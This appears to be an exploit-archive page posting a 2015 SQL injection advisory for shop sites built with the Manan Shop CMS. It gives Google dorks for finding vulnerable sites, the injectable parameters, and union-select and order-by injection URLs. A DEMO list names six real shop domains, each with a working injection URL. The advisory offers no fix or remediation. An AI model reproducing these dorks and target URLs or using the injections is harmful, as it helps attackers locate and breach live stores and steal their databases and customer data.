exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Manan Shop SQL Injection

Manan Shop SQL Injection
Posted Jul 4, 2015
Authored by Shelesh Rauthan

Sites designed by Manan Shop suffer from a remote SQL injection vulnerability. Note that this finding houses site-specific data.

tags | exploit, remote, sql injection
SHA-256 | a14f917d219a06c797eecb95f3c21f78f84f04402474606b520af23629d88522

Manan Shop SQL Injection

Change Mirror Download
=========================================================
[+] Title :- Manan Shop CMS - SQL Injection Vulnerability
[+] Date :- 4 - July - 2015
[+] Vendor Homepage :- http://www.manan.asia/
[+] Version :- All Versions
[+] Tested on :- Nginx/1.4.5, PHP/5.2.17, Linux - Windows
[+] Category :- webapps
[+] Google Dorks :- "Designed & Developed by Manan"
"Designed & Developed by Manan" "php?cat="
"Designed & Developed by Manan" +inurl:/.php?itemid=
[+] Exploit Author :- Shelesh Rauthan (ShOrTy420 aKa SEB@sTiaN)
[+] Team name :- Team Alastor Breeze, Intelligent-Exploit
[+] Official Website :- serverfarming.com, intelligentexploit.com
[+] The official Members :- Sh0rTy420, P@rL0u$, !nfIn!Ty, Th3G0v3Rn3R, m777k
[+] Greedz to :- @@lu, Lalit, MyLappy<3, Diksha, DK
[+] Contact :- fb.com/shelesh.rauthan, indian.1337.hacker@gmail.com, shortycharsobeas@gmail.com


=========================================================
[+] Severity Level :- High

[+] Request Method(s) :- GET / POST

[+] Vulnerable Parameter(s) :- itemid, numberofitems, catname, cat

[+] Affected Area(s) :- Entire admin, database, Server

[+] About :- Unauthenticated SQL Injection via Multiple Php Files causing an SQL error

[+] SQL vulnerable File :- /home1/outboxi1/public_html/DOMAIN.com/products_view.php

[+] POC :- http://127.0.0.1/index.php?id=[SQL]'

The sql Injection web vulnerability can be be exploited by remote attackers without any privilege of web-application user account or user interaction.

PoC:
http://www.[WEBSITE].com/index.php?cat=1&catname=Women&subcat=all&numberofitems=-9' order by [SQL INJECTION]--+
http://www.[WEBSITE].com/index.php?cat=1&catname=Women&subcat=all&numberofitems=-9' union all select [SQL INJECTION]--+


[+] DEMO :- http://www.etalage-id.com/index.php?cat=1&catname=Women&subcat=all&numberofitems=9%27
http://www.chloeprincess.com/index.php?cat=1&catname=Latest%20Collection&subcat=4&subcatname=ALL&itemid=2014%27
http://www.coralicekids.com/index.php?cat=100&catname=NewArrival&subcat=&subcatname=&itemid=2267%27
http://www.kamiidea.com/index.php?cat=7&catname=Accessories&subcat=32&subcatname=Shoes%27
http://www.loewyshop.com/index.php?cat=101&catname=Sale&subcat=all&subcatname=&itemid=46%27
http://www.outboxidea.com/ribbonshopstore.com/index.php?cat=100&catname=Bags&subcat=&subcatname=&itemid=464%27

=======================================================
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close